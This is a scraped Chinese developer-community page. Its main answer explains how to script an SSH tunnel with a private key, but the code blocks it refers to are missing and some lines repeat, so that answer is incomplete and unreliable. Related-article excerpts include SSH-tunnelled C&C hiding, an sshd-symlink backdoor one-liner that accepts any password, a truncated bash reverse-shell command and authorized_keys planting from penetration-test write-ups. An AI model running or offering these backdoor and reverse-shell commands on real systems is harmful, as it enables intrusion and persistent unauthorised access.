开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

如何在ssh之后通过bash脚本使用私钥创建到远程机器的隧道

在ssh之后，通过bash脚本使用私钥创建到远程机器的隧道，可以按照以下步骤进行：

创建一个bash脚本文件，例如 tunnel.sh，并使用文本编辑器打开它。
在脚本文件的开头，添加以下行，指定要使用的私钥文件路径和远程机器的IP地址（或域名）：
在脚本文件的开头，添加以下行，指定要使用的私钥文件路径和远程机器的IP地址（或域名）：
请将 /path/to/private_key.pem 替换为您实际的私钥文件路径，将 IP_address_or_domain 替换为您要连接的远程机器的IP地址或域名。
在脚本文件中添加以下行，使用ssh命令创建到远程机器的隧道：
在脚本文件中添加以下行，使用ssh命令创建到远程机器的隧道：
其中，<local_port> 是您本地机器上用于隧道的端口号，<remote_address> 是远程机器上您希望访问的地址，<remote_port> 是远程机器上对应的端口号，<username> 是您在远程机器上的用户名。
注意，-N 参数表示不执行远程命令，仅创建隧道。
保存并关闭脚本文件。
在终端中运行脚本文件：
在终端中运行脚本文件：
脚本将使用指定的私钥文件连接到远程机器，并在本地创建一个隧道，将本地端口与远程机器上指定的地址和端口关联起来。

这样，您就可以在ssh之后通过bash脚本使用私钥创建到远程机器的隧道。这种方法适用于需要在本地与远程机器之间建立安全通信的场景，例如远程访问数据库或服务等。

腾讯云相关产品和产品介绍链接地址：

云服务器（CVM）：https://cloud.tencent.com/product/cvm
云数据库 MySQL 版：https://cloud.tencent.com/product/cdb_mysql
云数据库 PostgreSQL 版：https://cloud.tencent.com/product/cdb_postgresql
云数据库 Redis 版：https://cloud.tencent.com/product/cdb_redis
云数据库 MongoDB 版：https://cloud.tencent.com/product/cdb_mongodb
腾讯云 VPC：https://cloud.tencent.com/product/vpc
腾讯云安全组：https://cloud.tencent.com/product/sfw

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

Ubuntu Server 第七章远程管理

关于SSH，不仅仅做用为链接，还可以做更多，前面的CS搭配Metasploit一章中也使用到了SSH隧道相关的知识。远程连接也不仅只有SSH一种远程连接方式。...使用Telnet可以进行简单的端口探测,例如： telnet smtp.163.com25,如链接成功则代表相关服务开启。...wuhash.com,这条命令将bash命令通过SSH输入给服务端sehll执行后，输出结果返回到本地的终端。...#如果想多个用户的话，推荐新建多个用户，使用"su user"切换到新建的用户主目录下编辑配置文件，启动实例 #虽然VNC本身有加密机制，不推荐长期开启，可以通过前面的SSH隧道来提升安全性 PUPPET...——珂儿吖架设你有100台服务器需要部署同样的服务，到这里还没有介绍脚本，即使你有脚本，不可能手动的依次运行下去。这里PUPPET不进行深入，了解即可。

2K2 0

无需公网IP，在家SSH远程连接公司内网服务器「cpolar内网穿透」

本次教程我们来实现如何在外公网环境下，SSH远程连接家里/公司的Linux CentOS服务器，无需公网IP，也不需要设置路由器。...安装cpolar后,会默认生成一个ssh名称的隧道,如果有ssh,则可以直接跳到查看在线隧道列表,然后远程连接如果没有,我们点击左侧仪表盘的隧道管理——创建隧道,由于ssh连接默认的是22端口，因此我们要来创建一条...随机地址公网远程连接在外我们可以通过这个公网地址来SSH远程连接Linux CentOS，以windows系统为例，我们使用在cmd窗口即可远程连接centOS ssh -p 端口号用户名@公网地址...首先要登录cpolar官网，点击左侧的预留在预留界面中，找到保留的TCP地址项目。在这个项目下，我们填入一些必要信息，如识别数据隧道的隧道名称、隧道使用区域等。...综上，成功实现了在外公网环境下也可以SSH远程连接到公司/家里的Linux CentOS服务器，不需要公网IP，也不用设置路由器，简单通过cpolar内网穿透工具映射本地22端口，通过所生成的公网地址来进行

4K3 0

不同环境下 Jenkins 调用 shell 脚本管理 docker 容器

一、生产环境 Jenkins 使用 ssh-copy-id 实现 SSH 无密码登录，实现方式如下： ssh-keygen 产生公钥与私钥对. ssh-copy-id 将本机的公钥复制到远程机器的 authorized_keys...文件中，ssh-copy-id 也能让你有到远程机器的 home, ~..../ssh , 和 ~/.ssh/authorized_keys 的权利第一步：在本地机器上使用 ssh-keygen 产生公钥私钥对 $ ssh-keygen 第二步：用 ssh-copy-id 将公钥复制到远程机器中...9、创建到目标主机的持久化连接 ssh -MNf @ 在后台创建到目标主机的持久化连接，将这个命令和你~/.ssh/config中的配置结合使用： Host host ControlPath...10、通过SSH连接屏幕 ssh -t remote_host screen –r 直接连接到远程屏幕会话（节省了无用的父bash进程）。

1.6K2 0

利用SSH隧道加密、隐蔽C&C通信流量

本文想通过标准的SSH的端口转发建立SSH形式的加密隧道，用于加密、隐蔽传输恶意流量，从而避免通过流量检测发现恶意行为。复现实验部分以C&C通信流量为例进入实验。...SSH隧道的实现主要使用SSH的参数配置进行端口转发，即将所需传输的数据内容通过加密的SSH隧道进行转发。...注：使用putty、winscp等工具时需要先使用对应平台工具进行rsa私钥导入后转化为相对应文件格式，如本次实验使用putty工具导入生成私钥文件sshrsa.ppk。...6) 通过interact命令则可以使用以建立的控制信道控制受控主机，如通过简单的ls命令测试成功如下图： ?...(2) 使用工具(如Empire、Metasploit等)构建C&C。 (3) 利用SSH的端口转发搭建SSH隧道。 (4) 配置C&C和SSH参数使二者配合实现加密、隐藏恶意流量的目的。

2K1 0

Linux SSH无密码使用私钥远程登录连接详细配置流程

在信息技术高速发展的今天，远程访问服务器和数据中心已成为企业日常运营不可或缺的一部分。然而，传统的远程连接方式，如使用用户密码进行SSH登录，虽然简单直接，却存在诸多安全隐患。...通过cpolar，我们可以轻松地将Linux SSH服务暴露到公网上，实现远程连接。 1....Linux安装Cpolar工具上面在本地成功设置了无密码使用私钥方式ssh 连接,并本地局域网测试成功,下面我们在Linux安装Cpolar内网穿透工具,通过Cpolar 转发本地端口创建公网地址,我们可以很容易实现远程访问...然后打开左侧在线隧道列表,查看刚刚创建隧道后生成的远程 TCP连接地址,这个地址就是远程连接的地址,在其他设备上使用该地址进行远程连接,下面进行远程地址连接测试 7....，将其复制下来再次打开cpolar web ui管理界面，点击左侧仪表盘的隧道管理——隧道列表，找到我们上面创建的TCP隧道，点击右侧的编辑修改隧道信息，将保留成功的固定tcp地址配置到隧道中端口类型

1211 0

如何实现无公网ip环境使用vscode远程ssh内网Linux系统写代码

而vscode可以很好的解决这些问题，它的核心组件都运行在远程环境中，本地的开发机器完全不需要拥有远程开发环境的源代码，在vscode上编写代码可以直接同步更新到服务器上，给你带来丝滑般的远程开发体验。...局域网测试连接远程服务器以ssh连接ubuntu为例，打开vscode后，先尝试使用局域网地址ssh远程ubuntu 输入命令到对话框中，并回车 ssh username@ip 选择一个配置文件输入完成在右侧会显示出来刚刚添加的...8080端口，HTTP协议 4.2 创建隧道映射我们可以直接使用样例隧道ssh，或者重新创建一个隧道，使用tcp协议,指向22端口。...——在线隧道列表，可以看到，刚刚创建的隧道已经有生成了相应的公网地址，将其复制下来 4.3 测试公网远程连接在windows上打开vscode，使用所复制的公网地址来远程SSH。...点击左侧的隧道管理——隧道列表，找到ssh隧道，点击右侧的编辑，我们来修改隧道信息，将固定tcp端口地址配置到隧道中修改隧道信息，将保留成功的固定tcp地址配置到隧道中端口类型：修改为固定tcp端口

1411 0

Windows系统如何ssh远程连接本地局域网内无公网IP的kali系统

前言本文主要介绍如何在本地Kali Linux系统启动ssh服务，并结合cpolar内网穿透软件生成公网地址，轻松实现无公网IP环境也能随时ssh远程连接Kali系统。 1....如首次使用,可以在下方官网链接中注册账号!...临时随机TCP端口地区：选择China VIP 点击创建然后打开左侧在线隧道列表,查看刚刚创建隧道后生成的 ssh tcp连接的地址,这个地址就是公网连接地址,我们可以在任意设备上使用该地址进行ssh...远程连接上面在kali 中创建了ssh 的公网地址,接下来我们在其他设备上使用公网地址进行ssh 远程连接测试,下面我们在windows 系统命令行进行连接,可以看到连接成功同样我们使用ssh 连接工具...地址配置到隧道中端口类型：修改为固定tcp端口预留的tcp地址：填写官网保留成功的地址，点击更新隧道更新成功后，点击左侧仪表盘的状态——在线隧道列表，可以看到公网地址已经更新成为了固定TCP地址

1491 0

高颜值外观Archcraft OS如何实现公网环境SSH远程连接【内网穿透】

Cpolar是一种安全的内网穿透云服务，可以将内网下的本地服务器通过安全隧道暴露至公网，使得公网用户可以正常访问内网服务，是一款内网穿透软件。...下面介绍如何在Archcraft中安装Cpolar 内网穿透工具,并以实现ssh 远程连接Archcraft 例子来说明使用Cpolar内网穿透的好处及优势!...TCP端口(首次使用选择随机地址测试) 地区：选择China 点击创建然后打开左侧在线隧道列表,查看刚刚创建隧道后生成的 ssh TCP连接的地址,这个地址就是公网连接地址,我们可以在任意设备上使用该地址进行...公网远程SSH连接上面在cpolar中创建了ssh 的公网地址,接下来我们在其他设备上使用公网地址进行ssh 远程连接测试,在Windows 系统命令行进行连接测试,按照ssh 格式输入命令后,可以看到连接成功...将其复制下来再次打开cpolar web ui管理界面，点击左侧仪表盘的隧道管理——隧道列表，找到我们上面创建的TCP隧道，点击右侧的编辑修改隧道信息，将保留成功的固定tcp地址配置到隧道中端口类型

1161 0

Windows系统安装OpenSSH结合VS Code远程ssh连接Ubuntu【内网穿透】

而vscode可以很好的解决这些问题，它的核心组件都运行在远程环境中，本地的开发机器完全不需要拥有远程开发环境的源代码，在vscode上编写代码可以直接同步更新到服务器上，给你带来丝滑般的远程开发体验。...局域网测试连接远程服务器以ssh连接ubuntu为例，打开vscode后，先尝试使用局域网地址ssh远程ubuntu 输入命令到对话框中，并回车 ssh username@ip 选择一个配置文件输入完成在右侧会显示出来刚刚添加的...8080端口，HTTP协议 4.2 创建隧道映射我们可以直接使用样例隧道ssh，或者重新创建一个隧道，使用tcp协议,指向22端口。...——在线隧道列表，可以看到，刚刚创建的隧道已经有生成了相应的公网地址，将其复制下来 4.3 测试公网远程连接在windows上打开vscode，使用所复制的公网地址来远程SSH。...点击左侧的隧道管理——隧道列表，找到ssh隧道，点击右侧的编辑，我们来修改隧道信息，将固定tcp端口地址配置到隧道中修改隧道信息，将保留成功的固定tcp地址配置到隧道中端口类型：修改为固定tcp端口

3941 0

【vscode远程开发】使用SSH远程连接服务器「内网穿透」

… 而vscode可以很好的解决这些问题，它的核心组件都运行在远程环境中，本地的开发机器完全不需要拥有远程开发环境的源代码，在vscode上编写代码可以直接同步更新到服务器上，给你带来丝滑般的远程开发体验...局域网测试连接远程服务器以ssh连接ubuntu为例，打开vscode后，先尝试使用局域网地址ssh远程ubuntu 输入命令到对话框中，并回车 ssh username@ip 选择一个配置文件...8080端口，HTTP协议 4.2 创建隧道映射我们可以直接使用样例隧道ssh，或者重新创建一个隧道，使用tcp协议,指向22端口。...——在线隧道列表，可以看到，刚刚创建的隧道已经有生成了相应的公网地址，将其复制下来 4.3 测试公网远程连接在windows上打开vscode，使用所复制的公网地址来远程SSH。...点击左侧的隧道管理——隧道列表，找到ssh隧道，点击右侧的编辑，我们来修改隧道信息，将固定tcp端口地址配置到隧道中修改隧道信息，将保留成功的固定tcp地址配置到隧道中端口类型：修改为固定tcp端口

1.6K9 1

使用内网穿透为本地欧拉操作系统配置公网地址实现其他设备ssh远程连接

前言本教程主要分享如何在华为欧拉openEuler系统中安装cpolar内网穿透工具实现使用ssh远程连接openEule系统....ssh远程连接访问 2. openEuler安装Cpolar openEuler是基于Linux 的系统,可以使用cpolar Linux 安装方式一键快捷安装,终端的命令界面,我们输入下面指令,如首次使用...TCP端口地区：选择China vip 点击创建然后打开左侧在线隧道列表,查看刚刚创建隧道后生成的 ssh tcp连接的地址,这个地址就是公网连接地址,我们可以在任意设备上使用该地址进行ssh 连接...公网远程SSH连接上面在cpolar中创建了ssh 的公网地址,接下来我们在其他设备上使用公网地址进行ssh 远程连接测试,下面我们在Windows 系统命令行进行连接,按照ssh 格式输入命令后,...，将其复制下来打开cpolar web ui管理界面，点击左侧仪表盘的隧道管理——隧道列表，找到我们上面创建的TCP隧道，点击右侧的编辑修改隧道信息，将保留成功的固定tcp地址配置到隧道中端口类型

1181 0

Archcraft系统安装cpolar内网穿透实现公网环境SSH远程连接

下面介绍如何在Archcraft中安装Cpolar 内网穿透工具,并以实现ssh 远程连接Archcraft 例子来说明使用Cpolar内网穿透的好处及优势!...Archcraft安装Cpolar Archcraft是一个基于Arch Linux的Linux发行版,可以使用cpolar Linux 安装方式一键快捷安装,终端的命令界面,我们输入下面指令,如首次使用...TCP端口(首次使用选择随机地址测试) 地区：选择China 点击创建然后打开左侧在线隧道列表,查看刚刚创建隧道后生成的 ssh TCP连接的地址,这个地址就是公网连接地址,我们可以在任意设备上使用该地址进行...公网远程SSH连接上面在cpolar中创建了ssh 的公网地址,接下来我们在其他设备上使用公网地址进行ssh 远程连接测试,在Windows 系统命令行进行连接测试,按照ssh 格式输入命令后,可以看到连接成功...将其复制下来再次打开cpolar web ui管理界面，点击左侧仪表盘的隧道管理——隧道列表，找到我们上面创建的TCP隧道，点击右侧的编辑修改隧道信息，将保留成功的固定tcp地址配置到隧道中端口类型

1321 0

攻击本地主机漏洞（下）

通过使用远程访问工具，如OpenSSH、RDP、FTP或虚拟网络计算（VNC），可以实现从主机到主机的数据透视。...SSH远程转发（即，-R SSH命令标志）是一种可用于建立从防火墙主机到防火墙外主机的反向隧道的技术，如图10-20所示。...从attackbox.example.com到端口2222/tcp的任何连接都将使用SSH反向隧道实际到达防火墙客户端。要通过远程出口点进行SSH，只需指向攻击中的SSH命令。...示例： ssh localhost -p 2222 选项： -p用于隧道回内部SSH客户端的远程出口端口提示：如果要启用应用程序从服务器到SSH客户端的X11转发，可以使用-X选项。...通过身份验证后，您可以浏览到http://www.internal.Web.org:8080从袭击中。实例org主机，您的连接将通过SSH转发隧道（即端口8080/tcp）连接到内部Web服务器。

3.3K1 0

Linux下常见的权限维持方式

进入/root/.ssh/文件夹，查看文件夹的内容，如下所示： ? 其中 id_rsa为私钥，id_rsa.pub为公钥，接下来打开id_rsa.pub，将内容复制到服务器。...通过软连接的方式，实质上PAM认证是通过软连接的文件名 /tmp/su 在/etc/pam.d/目录下寻找对应的PAM配置文件(如: /etc/pam.d/su)，任意密码登陆的核心是auth sufficient...在目标服务器上执行一句话后门： ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8888 执行完之后，任何一台机器ssh root@IP -p 8888，输入任意密码...a、创建shell脚本，例如在/etc/evil.sh #!...利用方法：安装完成后，使用ssh 用户@IP -P 配置的端口，即可远程登录。连接后的截图： ? 排查技巧：查看端口是否异常，RPM check查看命令是否被替换。

2.5K2 0

如何在openKlyin中设置ssh并结合cpolar内网穿透实现远程连接

开发的系统,同样支持ssh 连接,下面我们介绍如何在openKlyin中设置ssh连接,并结合cpolar内网穿透工具实现远程也可以ssh 连接openKlyin....然后我们通过windwos cmd命令窗口创建进行连接测试,在cmd出入ssh 连接命令,可以看到,连接成功,局域网测试通过了,下面我们安装cpolar工具,实现远程访问操作 3. openKylin安装...TCP端口 (首次使用选择随机地址测试) 地区：选择China vip 点击创建然后打开左侧在线隧道列表,查看刚刚创建隧道后生成的 ssh TCP连接的地址,这个地址就是公网连接地址,我们可以在任意设备上使用该地址进行...公网远程SSH连接上面在cpolar中创建了ssh 的公网地址,接下来我们在其他设备上使用公网地址进行ssh 远程连接测试,在Windows 系统命令行,按照ssh 格式输入命令后,可以看到连接成功...将其复制下来再次打开cpolar web ui管理界面，点击左侧仪表盘的隧道管理——隧道列表，找到我们上面创建的TCP隧道，点击右侧的编辑修改隧道信息，将保留成功的固定tcp地址配置到隧道中端口类型

1831 0

openKylin开放麒麟系统安装内网穿透实现任意设备SSH远程连接

本文主要介绍如何在openKlyin系统中设置ssh连接，并结合cpolar内网穿透工具实现远程也可以ssh连接本地局域网内部署的openKlyin系统. openKylin是中国首个基于Linux 的桌面操作系统开发者平台...然后我们通过windwos cmd命令窗口创建进行连接测试,在cmd出入ssh 连接命令,可以看到,连接成功,局域网测试通过了,下面我们安装cpolar工具,实现远程访问操作 3. openKylin安装...TCP端口 (首次使用选择随机地址测试) 地区：选择China vip 点击创建然后打开左侧在线隧道列表,查看刚刚创建隧道后生成的 ssh TCP连接的地址,这个地址就是公网连接地址,我们可以在任意设备上使用该地址进行...公网远程SSH连接上面在cpolar中创建了ssh 的公网地址,接下来我们在其他设备上使用公网地址进行ssh 远程连接测试,在Windows 系统命令行,按照ssh 格式输入命令后,可以看到连接成功...将其复制下来再次打开cpolar web ui管理界面，点击左侧仪表盘的隧道管理——隧道列表，找到我们上面创建的TCP隧道，点击右侧的编辑修改隧道信息，将保留成功的固定tcp地址配置到隧道中端口类型

1821 0

Windows系统ssh远程连接本地openKylin开放麒麟系统详细流程

前言本文主要介绍如何在openKlyin系统中设置ssh连接，并结合cpolar内网穿透工具实现远程也可以ssh连接本地局域网内部署的openKlyin系统. openKylin是中国首个基于Linux...然后我们通过windwos cmd命令窗口创建进行连接测试,在cmd出入ssh 连接命令,可以看到,连接成功,局域网测试通过了,下面我们安装cpolar工具,实现远程访问操作 3. openKylin安装...TCP端口 (首次使用选择随机地址测试) 地区：选择China vip 点击创建然后打开左侧在线隧道列表,查看刚刚创建隧道后生成的 ssh TCP连接的地址,这个地址就是公网连接地址,我们可以在任意设备上使用该地址进行...公网远程SSH连接上面在cpolar中创建了ssh 的公网地址,接下来我们在其他设备上使用公网地址进行ssh 远程连接测试,在Windows 系统命令行,按照ssh 格式输入命令后,可以看到连接成功...将其复制下来再次打开cpolar web ui管理界面，点击左侧仪表盘的隧道管理——隧道列表，找到我们上面创建的TCP隧道，点击右侧的编辑修改隧道信息，将保留成功的固定tcp地址配置到隧道中端口类型

2081 0

Windows终端远程SSH连接本地局域网内的openKylin系统详细教程

前言本文主要介绍如何在openKlyin系统中设置ssh连接，并结合cpolar内网穿透工具实现远程也可以ssh连接本地局域网内部署的openKlyin系统. openKylin是中国首个基于Linux...然后我们通过windwos cmd命令窗口创建进行连接测试,在cmd出入ssh 连接命令,可以看到,连接成功,局域网测试通过了,下面我们安装cpolar工具,实现远程访问操作 3. openKylin安装...TCP端口 (首次使用选择随机地址测试) 地区：选择China vip 点击创建然后打开左侧在线隧道列表,查看刚刚创建隧道后生成的 ssh TCP连接的地址,这个地址就是公网连接地址,我们可以在任意设备上使用该地址进行...公网远程SSH连接上面在cpolar中创建了ssh 的公网地址,接下来我们在其他设备上使用公网地址进行ssh 远程连接测试,在Windows 系统命令行,按照ssh 格式输入命令后,可以看到连接成功...将其复制下来再次打开cpolar web ui管理界面，点击左侧仪表盘的隧道管理——隧道列表，找到我们上面创建的TCP隧道，点击右侧的编辑修改隧道信息，将保留成功的固定tcp地址配置到隧道中端口类型

1361 0

使用Jenkins通过Publish Over SSH插件远程控制主机执行脚本

配置免密登录在Jenkins主机上生成一对密钥，公钥发送给需要被远程的主机，私钥配置到Jenkins中即可。...注意：私钥指的是Jenkins主机上生成的私钥，公钥在上面已经发送给被远程主机了。 Passphrase：SSH的密码，使用用户名/密码登录时为用户名的密码，使用私钥登录时为私钥的密码。 ...Name：SSH节点配置的名称，在构建中使用Publish over SSH插件时，此名称将出现在“SSH Server”中“Name”的下拉列表中，如下图： Hostname：通过SSH连接到的机器的主机名或...创建项目 Name：“系统管理>系统配置”设置的SSH Sverver的名字Name。 Source files：允许为空，复制到远程主机上的文件。 ...Remote directory：允许为空，文件得到到远程机上的目录，此目录是相对于“SSH Server”中的“Remote directory”的，如果不存在将会自动创建。

1.6K2 0

域渗透——多层内网环境渗透测试（三）

首先在攻击机上创建/root/.sh 目录用于保存我们的公钥和私钥 ssh-keygen -t rsa 第一行输入id_rsa，密码设置为空，直接回车 (echo -e "\n\n";cat id_rsa.pub...在提权之前，我们先对系统信息收集一下深度信息收集在tmp目录上传信息收集脚本，对机器进行信息收集反弹shell 反弹到入口机的shell bash -c 'exec bash -i &>/dev/.../tmp/hack上了，我们目前的思路是，把我们自己生成的ssh密钥复制到宿主机上进行写入到.ssh目录中的authorized_keys文件中，写入成功之后就可以使用该密钥进行登陆该机器。...3389 proxychains rdesktop 192.168.93.40 （注：这里kail无法直接连接域控的，因为kail无法与kdc进行身份校验，所以只能通过域控中的机器进行远程过去）上去之后把...mimikatz先给到第三层网络的windows7中，然后再拖入dc机器中，远程连接DC机器然后再192.168.93.40机器上远程控制域控机器权限维持---白银票据我们上了域控之后，先手保存域控的

6421 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭